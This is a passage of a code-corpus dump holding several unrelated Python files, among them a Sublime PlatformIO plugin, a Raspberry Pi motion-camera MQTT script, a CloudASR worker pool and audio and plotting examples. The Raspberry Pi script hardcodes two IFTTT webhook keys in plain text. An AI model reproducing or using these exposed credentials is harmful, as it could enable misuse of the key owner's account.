after that format the data to operate with\n\t\tthe standards required for the ST\n\n\t\tReturns:\n\t\t \t{json array} -- list of all boards to show in the menu\n\t\t\"\"\"\n\t\tvendors = {}\n\t\tboards = []\n\t\t\n\t\tdatas = json.loads(self.getFileBoards())\n\n\t\tfor datakey,datavalue in datas.items():\n\t\t\tfor infokey,infovalue in datavalue.items():\n\t\t\t\tvendor = datavalue['vendor']\n\t\t\t\tif(infokey == 'name'):\n\t\t\t\t\tname = infovalue.replace(vendor + \" \",\"\",1)\n\t\t\t\t\tchildren = vendors.setdefault(vendor,[])\n\t\t\t\t\tchildren.append({\"caption\":name,'command':'select_board',\"id\":datakey,\"checkbox\":True,\"args\":{\"board_id\":datakey}})\n\n\t\tfor vendor, children in vendors.items():\n\t\t\tboards.append({\"caption\":vendor,\"children\":children})\n\n\t\tboards = sorted(boards, key=lambda x:x['caption'])\n\t\tboards = boards\n\t\t\n\t\treturn boards\n\n\tdef createSerialPortsMenu(self):\n\t\t\"\"\"Serial ports\n\t\t\n\t\tCreate the list menu \"Serial ports\" with the list of all the\n\t\tavailables serial ports\n\t\t\"\"\"\n\n\t\tmenu_path_preset = DeviotPaths.getDeviotMenuPath('serial')\n\t\tmenu_preset = JSONFile(menu_path_preset)\n\t\tmenu_preset = menu_preset.getData()\n\n\t\tport_list = PlatformioCLI().getAPICOMPorts()\n\n\t\tmenu_ports = []\n\t\t\n\t\tfor port in port_list:\n\t\t\tport_name = port[\"port\"]\n\t\t\tmenu_ports.append({\"caption\":port_name,\"command\":\"select_port\",\"checkbox\":True,\"args\":{\"id_port\":port_name}})\n\n\t\tmenu_preset[0]['children'][0]['children'] = menu_ports\n\n\t\tserial_menu_path = DeviotPaths.setDeviotMenuPath('serial')\n\t\tserial_menu = JSONFile(serial_menu_path)\n\t\tserial_menu.setData(menu_preset)\n\t\tserial_menu.saveData()\n\n\n\tdef createMainMenu(self):\n\t\t\"\"\"Main menu\n\t\t\n\t\tCreates the main menu with the differents options\n\t\tincluding boards, libraries, COM ports, and user\n\t\toptions.\n\t\t\"\"\"\n\t\tself.createSerialPortsMenu()\n\n\t\tboards = self.createBoardsMenu()\n\n\t\tmain_file_path = DeviotPaths.getMainJSONFile()\n\t\tmenu_file = JSONFile(main_file_path)\n\t\tmenu_data = menu_file.data[0]\n\n\t\tfor fist_menu in menu_data:\n\t\t\tfor second_menu in menu_data[fist_menu]:\n\t\t\t\tif 'children' in second_menu:\n\t\t\t\t\tif(second_menu['id'] == 'initialize'):\n\t\t\t\t\t\tsecond_menu['children'] = boards\n\t\t\n\t\t# to format purposes\n\t\tmenu_data = [menu_data]\n\t\t\n\t\tmain_user_file_path = DeviotPaths.setDeviotMenuPath()\n\t\tfile_menu = JSONFile(main_user_file_path)\n\t\tfile_menu.setData(menu_data)\n\t\tfile_menu.saveData()\n\nclass Preferences(JSONFile):\n\t\"\"\"Preferences\n\t\n\tClass to handle the preferences of the plugin\n\t\n\tExtends:\n\t\tJSONFile\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"Construct\n\t\t\n\t\tPath loads the file where the preferences are stored,\n\t\tDoing that you avoid to pass the path every time you\n\t\tneed to get or set any preference.\n\t\t\"\"\"\n\t\tpath = DeviotPaths.getPreferencesFile()\n\t\tsuper(Preferences, self).__init__(path)\n\n\tdef set(self, key, value):\n\t\t\"\"\"Set value\n\t\t\n\t\tSave a value in the preferences file using a list and\n\t\tdictionaries.\n\t\t\n\t\tArguments:\n\t\t\tkey {string} -- identifier of the preference\n\t\t\tvalue {[type]} -- value of the preference\n\t\t\"\"\"\n\t\tself.data[key] = value\n\t\tself.saveData()\n\n\tdef get(self, key, default_value=False):\n\t\t\"\"\"Get Value\n\t\t\n\t\tGet a value in the preferences file stored as a list and\n\t\tdictionaries 
format.\n\t\t\n\t\tArguments:\n\t\t\tkey {string} -- identifier of the preference\n\t\t\n\t\tKeyword Arguments:\n\t\t\tdefault_value {string} -- if there is no value stored\n\t\t\t\t\t\t\t\t\t  you can set a default value (default: False)\n\t\t\n\t\tReturns:\n\t\t \t{string} -- Value of the preference\n\t\t\"\"\"\n\t\tvalue = self.data.get(key, default_value)\n\t\treturn value\n\n\tdef boardSelected(self,board_id):\n\t\t\"\"\"Chosen board\n\t\t\n\t\tAdd or delete the board selected from the preferences\n\t\tfiles. The boards are formatted in a dictionary in\n\t\tthe list 'board id'\n\t\t\n\t\tArguments:\n\t\t\tboard_id {string} -- identifier of the board selected\n\t\t\"\"\"\n\t\tfile_data = self.get('board_id','')\n\n\t\tif(file_data):\n\t\t\tif board_id in file_data:\n\t\t\t\tself.data.setdefault('board_id',[]).remove(board_id)\n\t\t\telse:\t\t\t\n\t\t\t\tself.data.setdefault('board_id',[]).append(board_id)\n\t\t\tself.saveData()\n\t\telse:\n\t\t\tself.set('board_id',[board_id])\n\n\tdef checkBoard(self, board_id):\n\t\t\"\"\"Is checked\n\t\t\n\t\tCheck if it is necessary to mark or unmark the board selected \n\t\t\n\t\tArguments:\n\t\t\tboard_id {string} -- identifier of the board selected\n\t\t\"\"\"\n\t\tcheck = False\n\t\tif(self.data):\n\t\t\tcheck_boards = self.get('board_id', '')\n\n\t\t\tif board_id in check_boards:\n\t\t\t\tcheck = True\n\t\treturn check\n\nclass PlatformioCLI(DeviotCommands.CommandsPy):\n\t\"\"\"Platformio\n\t\n\tThis class handles all the requests to the platformio ecosystem,\n\tfrom the list of boards to the build/upload of the sketches.\n\tMore info about platformio in: http://platformio.org/\n\t\n\tExtends:\n\t\tDeviotCommands.CommandsPy\n\t\"\"\"\n\tdef __init__(self, view=False):\n\t\t\"\"\"Construct\n\t\t\n\t\tInitialize the command and preferences classes; to check\n\t\tif the current working file is an IoT type it receives the view \n\t\tparameter (ST parameter). This parameter is necessary only in\n\t\tthe options like build or upload.\n\t\t\n\t\tKeyword Arguments:\n\t\t\tview {st object} -- stores many info related with ST (default: False)\n\t\t\"\"\"\n\t\tself.Preferences = Preferences()\n\t\tself.Commands = DeviotCommands.CommandsPy()\n\t\tself.view = view\n\n\t\tif(view):\n\t\t\tself.currentFilePath = DeviotPaths.getCurrentFilePath(view)\n\t\t\tself.cwd = DeviotPaths.getCWD(self.currentFilePath)\n\n\tdef getSelectedBoards(self):\n\t\t\"\"\"Selected Board(s)\n\t\t\n\t\tGet the board(s) list selected, from the preferences file, to\n\t\tbe initialized and formatted to be used in the platformio CLI\n\n\t\tReturns:\n\t\t\t{string} boards list in platformio CLI format\n\t\t\"\"\"\n\t\tboards = self.Preferences.get('board_id','')\n\t\ttype_boards = \"\"\n\t\t\n\t\tif(not boards):\n\t\t\treturn False\n\n\t\tfor board in boards:\n\t\t\ttype_boards += \"--board=%s \" % board\n\n\t\treturn type_boards\n\n\tdef initSketchProject(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tcommand to initialize the board(s) selected by the user. 
This\n\t\tfunction can only be used if the working file is an IoT type\n\t\t(checked by isIOTFile)\n\t\t\"\"\"\n\t\tinit_boards = self.getSelectedBoards()\n\n\t\tif(not init_boards):\n\t\t\tprint(\"No board selected\")\n\t\t\treturn\n\n\t\tcommand = \"platformio -f -c sublimetext init %s\" % init_boards\n\t\t\n\t\tif(not isIOTFile(self.view)):\n\t\t\tprint(\"This is not an IoT File\")\n\t\t\treturn\n\n\t\tprint(\"Initializing the project\")\n\t\tself.Commands.runCommand(command, self.cwd)\n\n\tdef buildSketchProject(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tCommand to build the current working sketch; it must be an IoT\n\t\ttype (checked by isIOTFile)\n\t\t\"\"\"\n\t\t# initialize the sketch\n\t\tself.initSketchProject()\n\n\t\tif(not self.Commands.error_running and isIOTFile(self.view)):\n\t\t\tprint(\"Building the project\")\n\n\t\t\ttry:\n\t\t\t\tshutil.copy(self.currentFilePath, self.cwd + '\\\\src')\n\t\t\texcept:\n\t\t\t\tprint(\"error copying the file\")\n\t\t\t\treturn\n\n\t\t\tcommand = \"platformio -f -c sublimetext run\"\n\t\t\tself.Commands.runCommand(command, self.cwd)\n\t\t\t\n\t\t\tif(not self.Commands.error_running):\n\t\t\t\tprint(\"Success\")\n\t\t\t\tself.Preferences.set('builded_sketch',True)\n\t\t\telse:\n\t\t\t\tprint(\"Error\")\n\t\t\t\tself.Preferences.set('builded_sketch',False)\n\n\tdef uploadSketchProject(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tUpload the sketch to the selected board through the selected COM port;\n\t\tit returns an error if no COM port is selected\n\t\t\"\"\"\n\t\tbuilded_sketch = self.Preferences.get('builded_sketch','')\n\n\t\tif(builded_sketch):\n\t\t\tid_port = self.Preferences.get('id_port','')\n\t\t\t\n\t\t\tif(not id_port):\n\t\t\t\tprint(\"No COM port selected\")\n\t\t\t\treturn\n\n\t\t\tcommand = \"platformio -f -c sublimetext run -t upload --upload-port %s\" % (id_port)\n\t\t\tself.Commands.runCommand(command, self.cwd)\t\n\n\tdef cleanSketchProject(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tDelete compiled object files, libraries and firmware/program binaries\n\t\tif a sketch has been built previously\n\t\t\"\"\"\n\t\t\n\t\tbuilded_sketch = self.Preferences.get('builded_sketch','')\n\n\t\tif(builded_sketch):\n\t\t\tprint(\"Cleaning\")\n\t\t\tcommand = \"platformio -f -c sublimetext run -t clean\"\n\t\t\tself.Commands.runCommand(command, self.cwd)\n\n\t\t\tif(not self.Commands.error_running):\n\t\t\t\tself.Preferences.set('builded_sketch',False)\n\n\n\tdef getAPICOMPorts(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tGet a JSON list with all the COM ports available; to do it, it uses the\n\t\tplatformio serialports command. 
To get more info about this function\n\t\tcheck: http://docs.platformio.org/en/latest/userguide/cmd_serialports.html\n\t\t\"\"\"\n\t\tcommand = \"platformio -f -c sublimetext serialports list --json-output\"\n\t\tport_list = json.loads(self.Commands.runCommand(command,setReturn=True))\n\n\t\tif(not self.Commands.error_running):\n\t\t\treturn port_list\n\n\tdef getAPIBoards(self):\n\t\t\"\"\"Get boards list\n\t\t\n\t\tGet the boards list from the platformio API using CLI.\n\t\tto know more about platformio visit: http://www.platformio.org/\n\n\t\tReturns: \n\t\t \t{json object} -- list with all boards in a JSON format\n\t\t\"\"\"\n\t\tboards = []\n\t\tcommand = \"platformio -f -c sublimetext boards --json-output\"\n\t\tboards = self.Commands.runCommand(command,setReturn=True)\n\t\treturn boards\n\n\ndef isIOTFile(view):\n\t\"\"\"IoT File\n\t\n\tCheck if the file in the current view of ST is an allowed\n\tIoT file, the files are specified in the exts variable.\n\t\n\tArguments:\n\t\tview {st object} -- stores many info related with ST\n\t\"\"\"\n\texts = ['ino','pde','cpp','c','.S']\n\tfile_name = view.file_name()\n\n\tif file_name and file_name.split('.')[-1] in exts:\n\t\treturn True\n\treturn False\n\ndef setStatus(view):\n\t\"\"\"Status bar\n\t\n\tSet the info to show in the status bar of Sublime Text.\n\tThis info is shown only when the working file is considered IoT\n\t\n\tArguments:\n\t\tview {st object} -- stores many info related with ST\n\t\"\"\"\n\tinfo = []\n\n\tif isIOTFile(view):\t\t\n\t\tinfo.append('Deviot ' + getVersion())\n\t\tfull_info = \" | \".join(info)\n\n\t\tview.set_status('Deviot', full_info)\n\n\n\ndef getVersion():\n\t\"\"\"Plugin Version\n\t\n\tGet the current version of the plugin stored in the preferences file.\n\n\tReturns:\n\t \t{String} -- Version of the file (only numbers)\n\t\"\"\"\n\treturn Preferences().get('plugin_version')\n\ndef setVersion(version):\n\t\"\"\"Plugin Version\n\t\n\tSave the current version of the plugin in the preferences file.\n\n\tReturns:\n\t \t{String} -- Version of the file (only numbers)\n\t \"\"\"\n\tPreferences().set('plugin_version',version)","sub_path":"DeviotFunctions.py","file_name":"DeviotFunctions.py","file_ext":"py","file_size_in_byte":14414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"511966824","text":"import numpy as np\n\n\ndef vertexes_to_projective(vertexes):\n    return np.concatenate([vertexes[:, :].copy(), np.ones(vertexes.shape[0]).reshape(-1, 1)], axis=1)\n\n\ndef trans_matrix(alpha, beta, gamma):\n    tr_matrix = np.array(\n        [[1, 0, 0, alpha],\n        [0, 1, 0, beta],\n        [0, 0, 1, gamma],\n        [0, 0, 0, 1]],\n        dtype=np.float64\n    )\n    return tr_matrix","sub_path":"affine_transformations/transfer_matrix.py","file_name":"transfer_matrix.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"576022302","text":"# Libraries Imported\nimport RPi.GPIO as GPIO\nimport paho.mqtt.client as mqtt\n\nfrom picamera import PiCamera\nfrom datetime import datetime\n\nimport time\nimport sys\nimport requests\nimport _thread\n\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n\ncamera_sys = PiCamera()\n\n\n# Procedure to Notify Argon_AC_3 of movement detection at the Entryway\ndef argon_notification_procedure():\n    print(\"Thread Starting for Argon_AC_3 Notification\")\n    timer_x = 0\n    while timer_x < 10:\n        # Secondary Client to communicate from RPi to Argon_AC_3\n        secondary_client = 
mqtt.Client(\"Reception_2_mqtt\")\n secondary_client.connect(\"test.mosquitto.org\", 1883)\n secondary_client.subscribe(\"argon_Log_AC_3\")\n secondary_client.publish(\"RPi_AC\", \"Active\")\n print(\"Sending data to ARGON; Active; time:\" + str(timer_x))\n time.sleep(1)\n timer_x += 1\n\n secondary_client = mqtt.Client(\"Reception_2_mqtt\")\n secondary_client.connect(\"test.mosquitto.org\", 1883)\n secondary_client.subscribe(\"argon_Log_AC_3\")\n secondary_client.publish(\"RPi_AC\", \"Non_Active\")\n print(\"Sending data to ARGON; Non_ACTIVE\")\n\n secondary_client.unsubscribe(\"argon_Log_AC_3\")\n\n print(\"Thread Exiting for Argon_AC_3 Notification\")\n _thread.exit()\n\n\n# Procedure to record Entryway after movement is detected\ndef camera_procedure():\n print(\"Thread Starting for Camera\")\n print(\"Camera Starting\")\n\n # Rotate Camera Imaging 180 Degrees\n camera_sys.rotation = 180\n\n # Pre-formate of Video File\n file_capture = \"Entranceway Recording at \" + time.strftime(\"%Y-%m-%d---%H-%M-%S\") + \".h264\"\n\n # Recording Entryway as a 7 Second Video\n camera_sys.start_recording(file_capture)\n time.sleep(7)\n camera_sys.stop_recording()\n\n print(\"Video Recorded\")\n time.sleep(2)\n\n print(\"Notifying User of Front Door Movement and Camera Recording\")\n requests.post(\"https://maker.ifttt.com/trigger/ARGON_AC_TEST_DETECTED_MOVEMENT/with/key/eU_JJJKmZOp_tczeQ56DCVRWKFmnvYPiAZ1fMz0oI6U\")\n requests.post(\"https://maker.ifttt.com/trigger/ARGON_AC_TEST_DETECTED_MOVEMENT/with/key/kI1LT7uJS81esfqdszCu4yNQw8Hace1mnJuhl3j-Q6-\")\n\n print(\"Thread Exiting for Camera\")\n _thread.exit()\n\n\n# Function which launches when a message is received from Argon_AC_Test (The Motion Sensor)\ndef message_function(client, userdata, message):\n # Decoding the Payload in the message\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n message.replace(\"argon_Log_AC_TEST\", '')\n\n # Converting message into integer\n range_in_centimetres = int(message)\n\n # IF Statement that stops client loop and launches multiple threads if movement is detected\n if (range_in_centimetres < 100):\n print(\"Movement Detected at the Front Door\")\n\n print(\"Stopping MQTT Connection Loop\")\n client.loop_stop()\n\n # Thread 1: Camera Procedure\n _thread.start_new_thread(camera_procedure, ())\n\n # Thread 2: Argon Notification Procedure\n _thread.start_new_thread(argon_notification_procedure, ())\n\n\n print(\"Procedure Exited, Restarting MQTT Connection Loop\")\n main()\n\n else:\n print(\"Doorway clear\")\n\n\ndef main():\n try:\n # Primary Client Between Argon_AC_TEST and RPi\n primary_client = mqtt.Client(\"Reception_1_mqtt\")\n primary_client.connect(\"test.mosquitto.org\", 1883)\n primary_client.subscribe(\"argon_Log_AC_TEST\")\n primary_client.on_message = message_function\n primary_client.loop_start()\n\n # while(1):\n # time.sleep(1)\n\n except:\n KeyboardInterrupt()\n\n\nmain()\n","sub_path":"RPi_Motion_Camera_Threaded.py","file_name":"RPi_Motion_Camera_Threaded.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"438633331","text":"#!/usr/bin/env python\n# a stacked bar plot with errorbars\nfrom pylab import *\n\nN = 5\nmenMeans = (20, 35, 30, 35, 27)\nwomenMeans = (25, 32, 34, 20, 25)\nmenStd = (2, 3, 4, 1, 2)\nwomenStd = (3, 5, 2, 3, 3)\nind = arange(N) # the x locations for the groups\nwidth = 0.35 # the width of the bars: can also be len(x) sequence\n\np1 = bar(ind, 
 menMeans, width, color='r', yerr=menStd)\np2 = bar(ind, womenMeans, width, color='y',\n bottom=menMeans, yerr=womenStd)\n\nylabel('Scores')\ntitle('Scores by group and gender')\nxticks(ind+width/2., ('G1', 'G2', 'G3', 'G4', 'G5') )\nyticks(arange(0,81,10))\nlegend( (p1[0], p2[0]), ('Men', 'Women') )\n\nshow()\n","sub_path":"sandbox/src1/examples/bar_stacked.py","file_name":"bar_stacked.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"620343558","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nsys.path.insert(0, os.path.join(os.path.dirname(sys.argv[0]),'autoProcess/'))\nimport logging\n\nimport migratecfg\nimport autoProcessMusic\nfrom nzbToMediaEnv import *\nfrom nzbToMediaUtil import *\n\n#check to migrate old cfg before trying to load.\nif os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), \"autoProcessMedia.cfg.sample\")):\n migratecfg.migrate()\n\nnzbtomedia_configure_logging(os.path.dirname(sys.argv[0]))\nLogger = logging.getLogger(__name__)\n\nLogger.info(\"====================\") # Separate old from new log\nLogger.info(\"nzbToHeadPhones %s\", VERSION)\n\n# SABnzbd\nif len(sys.argv) == SABNZB_NO_OF_ARGUMENTS:\n # SABnzbd argv:\n # 1 The final directory of the job (full path)\n # 2 The original name of the NZB file\n # 3 Clean version of the job name (no path info and \".nzb\" removed)\n # 4 Indexer's report number (if supported)\n # 5 User-defined category\n # 6 Group that the NZB was posted in e.g. alt.binaries.x\n # 7 Status of post processing. 0 = OK, 1=failed verification, 2=failed unpack, 3=1+2\n Logger.info(\"Script triggered from SABnzbd, starting autoProcessMusic...\")\n result = autoProcessMusic.process(sys.argv[1], sys.argv[2], sys.argv[7])\n# NZBGet\nelif len(sys.argv) == NZBGET_NO_OF_ARGUMENTS:\n # NZBGet argv:\n # 1 The final directory of the job (full path)\n # 2 The original name of the NZB file\n # 3 The status of the download: 0 == successful\n Logger.info(\"Script triggered from NZBGet, starting autoProcessMusic...\")\n result = autoProcessMusic.process(sys.argv[1], sys.argv[2], sys.argv[3])\nelse:\n Logger.warn(\"Invalid number of arguments received from client.\")\n Logger.info(\"Running autoProcessMusic as a manual run...\")\n result = autoProcessMusic.process('Manual Run', 'Manual Run', 0)\n","sub_path":"nzbToHeadPhones.py","file_name":"nzbToHeadPhones.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"238197660","text":"#!/usr/bin/env python3\nimport os\n\ndef split_file(filepath, lines=300): # specify number of lines per file\n path, filename = os.path.split(filepath)\n # filename.split('.') would not work for filenames with more than one .\n basename, ext = os.path.splitext(filename)\n # open input file\n with open(filepath, 'r') as f_in:\n try:\n # open the first output file\n f_out = open(os.path.join(path, '{}_{}{}'.format(basename, 0, ext)), 'w')\n # loop over all lines in the input file, and number them\n for i, line in enumerate(f_in):\n # every time the current line number can be divided by the\n # wanted number of lines, close the output file and open a\n # new one\n if i % lines == 0:\n f_out.close()\n f_out = open(os.path.join(path, '{}_{}{}'.format(basename, i, ext)), 'w')\n # write the line to the output file\n f_out.write(line)\n finally:\n f_out.close()\n \nif __name__ == '__main__':\n with open('file_to_split.txt', 'w') as f:\n for x in 
range(950): # the last line to split\n f.write('{}\\n'.format(x))\n split_file('file_to_split.txt')\n","sub_path":"python/splitFileByLine.py","file_name":"splitFileByLine.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"17344655","text":"import pytest\n\nfrom MicroTokenizer.tokenizers.hmm_tokenizer import HMMTokenizer\nfrom MicroTokenizer import default_model_dir\n\n\n@pytest.mark.parametrize(\"input_text\", pytest.helpers.tokenizer_test_cases())\ndef test_persist(tmpdir, input_text):\n temp_path = tmpdir.mkdir(\"hmm\")\n temp_path_str = str(temp_path)\n\n tokenizer = HMMTokenizer()\n tokenizer.train([[\"我\", \"是\", \"中国人\"], [\"你\", \"打\", \"人\"]])\n tokenizer.save(temp_path_str)\n assert len(temp_path.listdir()) == 3\n\n roundtrip_tokenizer = HMMTokenizer.load(temp_path)\n result = roundtrip_tokenizer.segment(input_text)\n pytest.helpers.assert_token_equals(result, input_text)\n\n\n@pytest.mark.parametrize(\"input_text\", pytest.helpers.tokenizer_test_cases())\ndef test_segment(input_text):\n tokenizer = HMMTokenizer.load(default_model_dir)\n\n result = tokenizer.segment(input_text)\n\n pytest.helpers.assert_token_equals(result, input_text)\n","sub_path":"tests/tokenizers/test_hmm_tokenizer.py","file_name":"test_hmm_tokenizer.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"104782392","text":"import zmq\nimport time, logging, os\nfrom collections import defaultdict\nfrom cloudasr import Poller\nfrom cloudasr.messages import HeartbeatMessage\nfrom cloudasr.messages.helpers import *\n\ndef create_master(worker_address, frontend_address, monitor_address):\n logging.basicConfig(level=os.environ['LOG_LEVEL'] or logging.INFO, format='%(levelname)s: %(asctime)s: %(message)s')\n poller = create_poller(worker_address, frontend_address)\n context = zmq.Context()\n monitor = context.socket(zmq.PUSH)\n monitor.connect(monitor_address)\n run_forever = lambda: True\n\n return Master(poller, monitor, run_forever)\n\n\ndef create_poller(worker_address, frontend_address):\n context = zmq.Context()\n worker_socket = context.socket(zmq.PULL)\n worker_socket.bind(worker_address)\n frontend_socket = context.socket(zmq.REP)\n frontend_socket.bind(frontend_address)\n\n sockets = {\n \"worker\": {\"socket\": worker_socket, \"receive\": worker_socket.recv, \"send\": worker_socket.send_json},\n \"frontend\": {\"socket\": frontend_socket, \"receive\": frontend_socket.recv, \"send\": frontend_socket.send},\n }\n time_func = time.time\n\n return Poller(sockets, time_func)\n\n\nclass Master:\n\n def __init__(self, poller, monitor, should_continue):\n self.poller = poller\n self.should_continue = should_continue\n self.workers = WorkerPool(monitor)\n self.time = 0\n\n def run(self):\n logging.info(\"Master node successfully set up and running...\")\n while self.should_continue():\n messages, self.time = self.poller.poll()\n\n if \"worker\" in messages:\n self.handle_worker_request(messages[\"worker\"])\n\n if \"frontend\" in messages:\n self.handle_fronted_request(messages[\"frontend\"])\n\n def handle_fronted_request(self, message):\n try:\n request = parseWorkerRequestMessage(message)\n model = request.model\n worker = self.workers.get_worker(model, self.time)\n\n message = createMasterResponseMessage(\"SUCCESS\", worker)\n self.poller.send(\"frontend\", message.SerializeToString())\n except 
NoWorkerAvailableException:\n message = createMasterResponseMessage(\"ERROR\")\n self.poller.send(\"frontend\", message.SerializeToString())\n\n def handle_worker_request(self, message):\n statuses = {\n HeartbeatMessage.STARTED: \"STARTED\",\n HeartbeatMessage.WAITING: \"WAITING\",\n HeartbeatMessage.WORKING: \"WORKING\",\n HeartbeatMessage.FINISHED: \"FINISHED\"\n }\n\n heartbeat = parseHeartbeatMessage(message)\n address = heartbeat.address\n model = heartbeat.model\n status = statuses[heartbeat.status]\n\n self.workers.add_worker(model, address, status, self.time)\n\n\nclass WorkerPool:\n\n def __init__(self, monitor):\n self.workers_status = defaultdict(lambda: {\"status\": \"STARTED\", \"last_heartbeat\": 0, \"waiting_for_first_chunk_secs\": 0})\n self.available_workers = defaultdict(list)\n self.monitor = monitor\n\n def get_worker(self, model, time):\n worker = self.find_available_worker(model, time)\n\n if worker is None:\n raise NoWorkerAvailableException()\n\n self.update_worker_status(model, worker, \"WORKING\", time)\n return worker\n\n def find_available_worker(self, model, time):\n logging.info(\"Finding available worker for the model {}\".format(model))\n logging.info(self.available_workers[model])\n logging.info(self.workers_status)\n while len(self.available_workers[model]) > 0:\n worker = self.available_workers[model].pop(0)\n logging.info(\"Is worker available?\")\n logging.info(worker)\n logging.info(self.is_worker_available(worker, time))\n\n if self.is_worker_available(worker, time):\n return worker\n\n return None\n\n def is_worker_available(self, worker, time):\n status = self.workers_status[worker]\n return status[\"status\"] and status[\"last_heartbeat\"] > time - 10\n\n def add_worker(self, model, address, status, time):\n worker_status = self.workers_status[address][\"status\"]\n logging.info(\"Handling worker heartbeat. worker_status: {}, address: {}\".format(worker_status, address))\n if worker_status == \"WORKING\":\n if status == \"FINISHED\" or status == \"STARTED\":\n self.available_workers[model].append(address)\n self.update_worker_status(model, address, \"WAITING\", time)\n\n if status == \"WORKING\":\n self.update_worker_status(model, address, \"WORKING\", time)\n\n if status == \"WAITING\":\n self.workers_status[address][\"waiting_for_first_chunk_secs\"] += 1\n\n if self.workers_status[address][\"waiting_for_first_chunk_secs\"] == 10:\n self.available_workers[model].append(address)\n self.update_worker_status(model, address, \"WAITING\", time)\n elif worker_status == \"STARTED\":\n logging.info(\"Worker successfully established connection. 
Its model is: {}, Address: {}, Status: {}\".format(model, address, status))\n self.available_workers[model].append(address)\n self.update_worker_status(model, address, \"STARTED\", time)\n elif worker_status == \"WAITING\":\n self.update_worker_status(model, address, \"WAITING\", time)\n\n def update_worker_status(self, model, worker, status, time):\n self.workers_status[worker] = {\n \"status\": \"WAITING\" if status == \"STARTED\" else status,\n \"last_heartbeat\": time,\n \"waiting_for_first_chunk_secs\": 0\n }\n\n worker_status = createWorkerStatusMessage(worker, model, status, int(time))\n self.monitor.send(worker_status.SerializeToString())\n logging.info(\"Send worker status to the monitor : {}, Status: {}, worker: {}\".format(model, status, worker))\n\n\nclass NoWorkerAvailableException(Exception):\n pass\n","sub_path":"cloudasr/master/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613688036","text":"senha = int(input(\"Informe a senha: \"))\n\nnum1 = senha // 100000\nnum2 = senha // 10000 % 10\nnum3 = senha // 1000 % 10\nnum4 = senha // 100 % 10\nnum5 = senha // 10 % 10\nnum6 = senha % 10\n\nsoma1 = num2 + num4 + num6\nsoma2 = num1 + num3 + num5\n\nif ((soma1 % soma2) == 0):\n\tprint (\"acesso liberado\")\nelse:\n\tprint (\"senha invalida\")\n","sub_path":"5 - Notebooks e Data/1 - Análises num��ricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/223/users/4187/codes/1644_2446.py","file_name":"1644_2446.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"113784564","text":"# play_wav_stereo.py\n\nimport pyaudio\nimport wave\nimport struct\nimport math\n\ndef clip16( x ): \n # Clipping for 16 bits\n if x > 32767:\n x = 32767\n elif x < -32768:\n x = -32768\n else:\n x = x \n return int(x)\n\ngain = 0.9\ngain1 = 0.8\n# wavfile = \"cat01.wav\"\n# wavfile = 'sin01_mono.wav'\nwavfile = 'sin01_stereo.wav'\n\nprint(\"Play the wave file %s.\" % wavfile)\n\nwf = wave.open( wavfile, 'rb' )\n\n# Read the wave file properties\nnum_channels = wf.getnchannels() \t# Number of channels\nFs = wf.getframerate() # Sampling rate (frames/second)\nsignal_length = wf.getnframes() \t# Signal length\nwidth = wf.getsampwidth() \t\t# Number of bytes per sample\n\nprint(\"The file has %d channel(s).\" % num_channels)\nprint(\"The frame rate is %d frames/second.\" % Fs)\nprint(\"The file has %d frames.\" % signal_length)\nprint(\"There are %d bytes per sample.\" % width)\n\n# ----------------------------------\n\n# Set parameters of delay system\nGfb = 0.8 # feed-back gain\ng0 = 0.9 # direct-path gain\ng11 = 1.0 # a feed-forward gain\n # a feed-forward gain\ng21 = 1.0\n# g22 = 0.8\n# Set g0 = Gdp, g1 = 0, g2 = Gff to recover system in feedbackdelay_circbuffer.py\n# (Check..)\n\ndelay1_sec = 0.4\ndelay2_sec = 0.5 # delay2_sec > delay1_sec\n\ndelay1 = int( math.floor( Fs * delay1_sec ) ) # Delay in samples\ndelay2 = int( math.floor( Fs * delay2_sec ) ) \n\n# Create a delay line (buffer) to store past values. 
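One circular buffer is kept per delay tap, and the indices k, m1 and m2 below wrap around at the buffer length.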
Initialize to zero.\n\nbuffer_length1 = delay1\nbuffer_length2 = delay2 # minimal-length buffer\nbuffer1 = [ 0 for i in range(buffer_length1) ] \nbuffer2 = [ 0 for j in range(buffer_length2) ] \n\nprint('The delay of {0:.3f} seconds is {1:d} samples.'.format(delay1_sec, delay1))\nprint('The delay of {0:.3f} seconds is {1:d} samples.'.format(delay2_sec, delay2))\nprint('My buffer is of length {0:d}'.format(buffer_length1))\n\n# ----------------------------------\n\np = pyaudio.PyAudio()\n\nstream = p.open(format = pyaudio.paInt16,\n channels = num_channels,\n rate = Fs,\n input = False,\n output = True )\n\ninput_string = wf.readframes(1) # Read first frame\n\n\n\nk = 0\nm1 = 2\nm11 = 0\nm2 = 2\nm22 = 0\n\nprint (\"**** playing ****\")\nwhile input_string != b'': # readframes() returns bytes, so compare with b'' to detect end of file\n\n # Convert string to numbers\n input_tuple = struct.unpack('hh', input_string) # produces a two-element tuple\n\n\n 